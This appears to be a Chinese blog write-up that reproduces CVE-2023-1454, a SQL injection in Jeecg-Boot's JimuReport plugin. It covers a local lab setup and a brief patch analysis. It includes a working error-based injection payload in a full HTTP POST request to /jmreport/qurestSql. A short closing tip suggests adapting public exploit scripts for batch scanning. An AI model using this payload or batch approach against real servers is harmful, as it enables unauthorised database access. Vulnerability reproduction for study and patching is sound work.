CVE-2023-1454注入分析复现

简介

JeecgBoot的代码生成器是一种可以帮助开发者快速构建企业级应用的工具,它可以通过一键生成前后端代码,无需写任何代码,让开发者更多关注业务逻辑。

影响版本

Jeecg-Boot<=3.5.1

环境搭建

idea+

后端源码:

https://github.com/jeecgboot/jeecg-boot/archive/refs/tags/v3.5.0.zip

前端源码:

https://github.com/jeecgboot/jeecgboot-vue3/archive/refs/tags/v3.5.0.zip

安装npm,安装nodejs

https://nodejs.org/dist/v18.16.1/node-v18.16.1-x64.msi

安装yarn

复制代码
npm install -g yarn

下载依赖

复制代码
yarn install
yarn run serve  //起服务

由于是前后端分离,需要数据库导入表,使用navicat直接导入即可

后端服务端搭建,使用idea搭建导入项目,修改数据库配置

配置server端npm服务

配置好之后直接启动,访问

http://localhost:3100/login

搭建成功

漏洞复现

前后端分离,后端端口8080 ,Payload:

复制代码
{"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}

POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Content-Type: application/json
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Length: 128

{"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}

分析

漏洞产生点位于积木报表插件内,查看更新的3.5.1的版本更新

更改了72处的文件,其中需要注意db/其他数据库/jeecgboot-sqlserver2019.sql中重写了数据插入的方法

jeecg-boot-base-core/src/main/java/org/jeecg/common/util/SqlInjectionUtil.java中增加了对sql语句的正则

这个修复是针对于后端的SQL注入,/sys/duplicate/check

目前最新更新的3.5.1版本似乎依旧没有针对积木报表注入点儿的加固措施,修复时更换jar包

目前积木官方的jar包已升级。

关注积木5月份的升级日志

http://jimureport.com/doc/log

小结

github上有师傅们的脚本,但是如果要批量使用的话建议在修改一下response的内容,仅仅只有操作失败的报错的话会存在大批量的报错。

所有自定义的if判断的回显都建议修改一下,如有错误欢迎指出。

参考连接

http://jimureport.com/doc/log

https://github.com/Sweelg/CVE-2023-1454-Jeecg-Boot-qurestSql-SQLvuln

https://github.com/padbergpete47/CVE-2023-1454

相关推荐
unable code1 小时前
攻防世界-Misc-SimpleRAR
网络安全·ctf·misc·1024程序员节
Oxo Security2 小时前
【AI安全】检索增强生成(RAG)
人工智能·安全·网络安全·ai
小李独爱秋4 小时前
计算机网络经典问题透视:什么是NAPT?它有哪些特点?
网络·网络协议·计算机网络·网络安全·智能路由器
Whoami!4 小时前
⸢ 拾叁-Ⅱ⸥⤳ 安全水位评估框架(下):安全水位指标
网络安全·信息安全·安全水位指标
知花实央l4 小时前
【Web应用实战】 文件上传漏洞实战:Low/Medium/High三级绕过(一句话木马拿webshell全流程)
前端·学习·网络安全·安全架构
介一安全10 小时前
从 0 到 1 玩转 2025 最新 WebGoat 靶场:环境搭建 + 全关卡漏洞解析(超级详细)
java·web安全·网络安全·靶场
sadandbad1 天前
[vulhub靶机通关]DC-2(rbash绕过_git提权)
网络·sql·web安全·网络安全
麦烤楽鸡翅1 天前
幂数加密(攻防世界)
网络安全·密码学·ctf·crypto·解密·攻防世界·幂数加密
椰羊sqrt1 天前
CVE-2025-4334 深度分析:WordPress wp-registration 插件权限提升漏洞
android·开发语言·okhttp·网络安全
Oxo Security1 天前
【AI安全】提示词注入
人工智能·安全·网络安全·ai